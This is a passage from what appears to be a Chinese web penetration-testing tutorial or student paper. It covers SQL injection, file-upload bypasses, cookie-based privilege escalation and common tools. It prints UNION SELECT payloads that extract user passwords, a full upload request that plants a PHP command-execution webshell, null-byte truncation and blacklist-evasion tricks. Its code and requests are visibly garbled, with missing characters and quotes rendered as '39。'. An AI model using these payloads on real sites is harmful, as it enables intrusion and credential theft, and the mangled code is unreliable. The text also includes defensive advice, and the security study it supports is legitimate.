【文章內(nèi)容簡介】 om papers where id=1 and 1=2頁面返回顯示不正常。圖7 正常頁面對(duì)比不正常頁面php+mysql手工注入演示（39。 union select user(),database() ）圖8 注入演示1php+mysql手工注入演示（39。 union select 1,2 ）圖9 注入演示2php+mysql手工注入演示（39。 union select user,password from users ）圖10 注入演示3　文件上傳 上傳檢測流程概述 圖11 上傳演示1文件上傳檢測方法通常一個(gè)文件以HTTP協(xié)議進(jìn)行上傳時(shí)，將以POST請(qǐng)求發(fā)送至web服務(wù)器，web服務(wù)器接收到請(qǐng)求并同意后，用戶與web服務(wù)器將建立連接，并傳輸dafa【9】。通常在文件上傳過程中會(huì)檢測下面紅顏色標(biāo)出來的代碼。圖12 上傳演示2A 客戶端對(duì)前端語言javascript 檢測(通常為檢測需要上傳的文件擴(kuò)展名)B 服務(wù)端對(duì)所上傳文件的MIME 類型檢測(檢測ContentType 內(nèi)容)C 服務(wù)端對(duì)所上傳文件的目錄路徑檢測(檢測跟path 參數(shù)相關(guān)的內(nèi)容)D 服務(wù)端對(duì)所上傳文件的文件擴(kuò)展名檢測(檢測跟文件extension 相關(guān)的內(nèi)容)E 服務(wù)端對(duì)所上傳文件的文件內(nèi)容檢測(檢測內(nèi)容是否合法或含有惡意代碼)客戶端檢測繞過(javascript 檢測)圖13 上傳演示3客戶端檢測主要是通過前端javascript腳本檢測文件的后綴是否為允許的格式。服務(wù)端檢測繞過(MIME 類型檢測)圖14 上傳演示4 代碼如下?phpif($_FILES[39。userfile39。][39。type39。] != image/gif) { //檢測Contenttypeecho Sorry, we only allow uploading GIF images。exit。}$uploaddir = 39。uploads/39。$uploadfile = $uploaddir . basename($_FILES[39。userfile39。][39。name39。])。if (move_uploaded_file($_FILES[39。userfile39。][39。tmp_name39。], $uploadfile)) {echo File is valid, and was successfully uploaded.\n。} else {echo File uploading failed.\n。}?然后我們可以將request 包的ContentType 修改POST / HTTP/TE: deflate,gzip。q=Connection: TE, closeHost: localhostUserAgent: libperl/ContentType: multipart/formdata。 boundary=xYzZYContentLength: 155xYzZYContentDisposition: formdata。 name=userfile。 filename=ContentType: image/gif (原為ContentType: text/plain)?php system($_GET[39。mand39。])。?sSxYzZY收到服務(wù)器端返回來的應(yīng)答HTTP/ 200 OKDate: Thu, 31 May 2011 14:02:11 GMTServer: ContentLength: 59Connection: closeContentType: text/htmlpreFile is valid, and was successfully uploaded./pre可以看到我們成功繞過了服務(wù)端MIME 類型檢測。像這種服務(wù)端檢測 包的ContentType 都可以用這種類似的方法來繞過檢測。圖15 上傳演示5服務(wù)器檢測繞過(目錄路徑檢測)圖16 上傳演示6目錄路徑檢測，一般就是檢測上傳的路徑是否合法，稍微有一些特殊一點(diǎn)的都沒有防御。比如比較新的fckeditor php = 任意文件上傳漏洞圖17 上傳演示7可以看到圖中，在最后將要進(jìn)行寫文件之前的變量狀態(tài)sFilePath = C:/wamp//userfiles/image/ .gif/ (.php 后面是0x00)當(dāng)右圖執(zhí)行move_uploaded_file( $oFile[39。tmp_name39。], $sFilePath) 這個(gè)函數(shù)時(shí)把FilePath 寫入到了確定的位置，但是web服務(wù)器軟件底層是用C語言寫的，遇到0x00還是會(huì)截?cái)?，所以最后C:/wamp//userfiles/image/； 里的內(nèi)容然后把C:/Temp/phpf3at7b 的內(nèi)容寫入到C:/wamp//userfiles/image/ 里這樣便獲得了我們所想要的webshell。服務(wù)端檢測繞過(文件擴(kuò)展名檢測)圖18 上傳演示8通過改變文件名的大小寫繞過，用像pHp，Asa 諸如此類的文件名以此來繞過黑名單檢測；黑名單的名單列表繞過，用黑名單里沒有的名單進(jìn)行攻擊，比如有些黑名單里并沒有cer 或asa 之類；使用特殊的文件名繞過，比如把發(fā)送的 (下劃線為空格) .，通過這種命名方式，但是在windows 系統(tǒng)里是不會(huì)被允許的通過的，所以只需要在burpsuit 之類和feider里進(jìn)行修改，然后繞過驗(yàn)證后，會(huì)被windows操作系統(tǒng)自動(dòng)去掉文件后面的點(diǎn)和空格，但要防止注意Linux/Unix 操作系統(tǒng)沒有這個(gè)特性；使用0x00 截?cái)嗬@過，在擴(kuò)展名檢測這一塊目前我只遇到過asp 的程序有這種漏洞，給個(gè)簡單的偽代碼name = getname( request) ， .jpg(asp 后面為0x00)。type = “”gettype(name) 而在gettype()函數(shù)里處理方式是從后往前掃描擴(kuò)展名，所以“”判斷為jpg：if (type == jpg)SaveFileToPath(, name) /在這里將會(huì)是以0x00 作為文件名截?cái)啵?存入路徑里。圖19 上傳演示9服務(wù)端檢測繞過(文件內(nèi)容檢測)這種文件內(nèi)容檢測是做嚴(yán)格的，如果能把這道關(guān)卡突破了，后面所有的上傳漏洞都會(huì)有很大機(jī)會(huì)，配合一些web服務(wù)器軟件的解析漏洞，會(huì)使攻擊者如虎添翼?！∵壿嬄┒催壿嬙綑?quán)漏洞，越權(quán)分為垂直越權(quán)和平行越權(quán)。垂直越權(quán)舉例：某論壇存在任意垂直越權(quán)，隨意注冊(cè)一個(gè)用戶，注冊(cè)成功后用該用戶名和密碼登錄該論壇，通過修改COOKIES中username的值就可以獲取相應(yīng)用戶的權(quán)限。發(fā)布修改文章、查看訂單、操作。圖20 邏輯漏洞1圖21 邏輯漏洞驗(yàn)證平行越權(quán)舉例：平行越權(quán)常修改某一參數(shù)，可以枚舉出所有不同結(jié)果，這樣信息就泄露了。POST /u/*****.do?amp。_t=1420879245405 HTTP/Host: .*******.UserAgent: Mozilla/ (Windows NT 。 WOW64。 rv:) Gecko/20100101 Firefox/Accept: text/html, */*AcceptLanguage: zh,zh。q=,enus。q=,en。q=AcceptEncoding: gzip, deflateContentType: application/xformurlencoded。 charset=UTF8XRequestedWith: XMLHttpRequestReferer: ://.******./member/ContentLength: 39Cookie: cookie hideXForwardedFor: Connection: keepalivePragma: nocacheCacheControl: nocachexcase=initamp。=82833邏輯漏洞的防御。cookie中設(shè)定多個(gè)驗(yàn)證，比如自如APP的cookie中，需要sign和ssid兩個(gè)參數(shù)配對(duì)，才能返回?cái)?shù)據(jù)。用戶的cookie數(shù)據(jù)加密應(yīng)嚴(yán)格使用標(biāo)準(zhǔn)加密算法，并注意密鑰管理。用戶的cookie的生成過程中最好帶入用戶的密碼，一旦密碼改變，cookie的值也會(huì)改變。cookie中設(shè)定session參數(shù)，以防cookie可以長時(shí)間生效。3　 web滲透測試常用工具 　Firefox火狐瀏覽器Firefox是火狐瀏覽器，也是一款手工滲透的得力助手，因?yàn)橛泻芏嗖寮梢杂?，這點(diǎn)讓火狐稱為滲透愛好者愛不釋手，常用的插件有Firebug這個(gè)Firebug把豐富的集成工具在里面，可以隨時(shí)調(diào)用調(diào)試，不需要借助其他的工具，這個(gè)是非常方便的。User Agent Switcher這個(gè)可以修改HTTP協(xié)議里面USER Agent 頭，讓瀏覽器偽裝成其他訪問設(shè)備。Hackbar這個(gè)插件是SQL注入和XSS常用的，里面有編碼解碼，加密解密等好用的功能。FoxyProxy這個(gè)是用來切換代理的工具，讓自己web瀏覽器隨時(shí)切換代理很方便。圖22 火狐瀏覽器截圖　AWVS 網(wǎng)站掃描器AWVS(Acunetix Web Vulnerability Scanner)這是一個(gè)自動(dòng)式檢測網(wǎng)站漏的工具，在手工檢測開始之前可以先讓AWVS跑跑網(wǎng)站，可以看到網(wǎng)站目錄結(jié)構(gòu)和一些顯而易見的漏洞。圖23 AWVS界面截圖AWVS該掃描器支持網(wǎng)站的整站掃描，網(wǎng)站的整站爬行，還可以掃描指定網(wǎng)站開放的特殊端口，還支持子域名掃描，SQL盲注手工檢測，HTTP信息的查看和編輯，HTTP的監(jiān)聽